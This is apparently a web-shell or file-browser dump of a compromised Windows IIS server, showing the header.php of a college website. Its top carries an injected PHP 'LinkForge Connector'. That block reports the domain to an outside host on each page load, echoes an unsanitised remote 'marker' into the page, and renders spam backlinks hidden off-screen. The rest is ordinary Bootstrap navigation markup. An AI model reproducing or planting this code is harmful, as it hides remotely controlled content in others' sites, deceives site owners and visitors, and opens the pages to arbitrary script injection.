Windows NT P3613 10.0 build 20348 (Windows Server 2022) AMD64
C:
/
Inetpub
/
vhosts
/
gyandeepclasses.com
/
pdpandyamcc.com
/
Noticeimages
/
C:/Inetpub/vhosts/gyandeepclasses.com/pdpandyamcc.com/Noticeimages/header.php
<?php // LinkForge Connector - Add to footer.php $_lf_d = preg_replace('/^www\./', '', $_SERVER['HTTP_HOST']); $_lf_u = 'https://linkforge.cc'; $_lf_f = function($u) { if (function_exists('curl_init')) { $c=curl_init($u); curl_setopt_array($c,[CURLOPT_RETURNTRANSFER=>1,CURLOPT_TIMEOUT=>5,CURLOPT_FOLLOWLOCATION=>1]); $r=curl_exec($c); curl_close($c); return $r; } return @file_get_contents($u); }; // Register domain $_lf_f($_lf_u.'/api/connect?'.http_build_query(['domain'=>$_lf_d,'language'=>substr($_SERVER['HTTP_ACCEPT_LANGUAGE']??'en',0,2),'connected_via'=>'php'])); // Inject backlinks + verification marker $_lf_r = $_lf_f($_lf_u.'/api/links?domain='.urlencode($_lf_d)); if ($_lf_r) { $_lf_j = json_decode($_lf_r, true); // Emit marker (required for verification — do not remove) if (!empty($_lf_j['marker'])) { echo $_lf_j['marker']; } if (!empty($_lf_j['links'])) { echo '<div style="position:absolute;left:-9999px;opacity:0;height:1px;width:1px;overflow:hidden;">'; foreach ($_lf_j['links'] as $_lf_l) { echo '<a href="'.htmlspecialchars($_lf_l['url']).'">'.htmlspecialchars($_lf_l['anchor']).'</a>'; } echo '</div>'; } } ?><?php $currentPage= basename($_SERVER['SCRIPT_NAME']); // echo $currentPage; ?> <!DOCTYPE html> <html lang="en"> <head> <title>P.D. Pandya Mahila Commerce College</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <link href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet"> <link href="https://fonts.googleapis.com/css?family=Poppins:200,300,400,500,600,700,800,900&display=swap" rel="stylesheet"> <link rel="shortcut icon" type="image/x-icon" href="images/fevicon.png"> <link rel="stylesheet" href="css/open-iconic-bootstrap.min.css"> <link rel="stylesheet" href="css/animate.css"> <link rel="stylesheet" href="css/owl.carousel.min.css"> <link rel="stylesheet" href="css/owl.theme.default.min.css"> <link rel="stylesheet" href="css/magnific-popup.css"> <link rel="stylesheet" href="css/aos.css"> <link rel="stylesheet" href="css/ionicons.min.css"> <link rel="stylesheet" href="css/flaticon.css"> <link rel="stylesheet" href="css/icomoon.css"> <link rel="stylesheet" href="css/style.css"> </head> <body> <div class="bg-top navbar-light"> <div class="container"> <div class="row no-gutters d-flex align-items-center align-items-stretch"> <div class="col-md-4 d-flex align-items-center py-4"> <!-- <a class="navbar-brand" href="index.html">P.D.Pandya <span> Mahila Commerce College</span></a> --> <a href="index.php"> <img src="images/logo.png" alt="" width="80%"> </a> </div> <div class="col-lg-8 d-block"> </div> </div> </div> </div> <nav class="navbar navbar-expand-lg navbar-dark bg-dark ftco-navbar-light" id="ftco-navbar"> <div class="container d-flex align-items-center px-4"> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#ftco-nav" aria-controls="ftco-nav" aria-expanded="false" aria-label="Toggle navigation"> <span class="oi oi-menu"></span> Menu </button> <!-- <form action="#" class="searchform order-lg-last"> <div class="form-group d-flex"> <input type="text" class="form-control pl-3" placeholder="Search"> <button type="submit" placeholder="" class="form-control search"><span class="ion-ios-search"></span></button> </div> </form> --> <div class="collapse navbar-collapse" id="ftco-nav"> <ul class="navbar-nav mr-auto"> <li class="nav-item <?php if($currentPage=="index.php") echo "active";?>"><a href="index.php" class="nav-link pl-0">Home</a></li> <li class="nav-item dropdown <?php if($currentPage=="about.php"||$currentPage=="founder.php"||$currentPage=="managingtrustee.php"||$currentPage=="trustee.php") echo "active";?>"> <a href="#" class="nav-link dropdown-toggle" id="aboutDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">About</a> <div class="dropdown-menu" aria-labelledby="aboutDropdown"> <a class="dropdown-item" href="about.Php">About Us</a> <a class="dropdown-item" href="founder.php">Founder</a> <a class="dropdown-item" href="managingtrustee.php">Managing Trustee</a> <!-- <a class="dropdown-item" href="trustee.php">Trustee</a> --> <a class="dropdown-item" href="trustee.php">Trustee</a> </div> </li> <li class="nav-item <?php if($currentPage=="Events.php"||$currentPage=="eventdetails.php") echo "active";?>"><a href="Events.php" class="nav-link">Events</a></li> <li class="nav-item <?php if($currentPage=="Infrastrcture.php"||$currentPage=="InfrastructureDetail.php") echo "active";?>"><a href="Infrastrcture.php" class="nav-link">Infrastructure</a></li> <li class="nav-item <?php if($currentPage=="teacher.php") echo "active";?>"><a href="teacher.php" class="nav-link">Staff</a></li> <li class="nav-item <?php if($currentPage=="results.php") echo "active";?>"><a href="results.php" class="nav-link">Result</a></li> <li class="nav-item <?php if($currentPage=="contact.php") echo "active";?>"><a href="contact.php" class="nav-link">Contact</a></li> </ul> </div> </div> </nav> <!-- END nav -->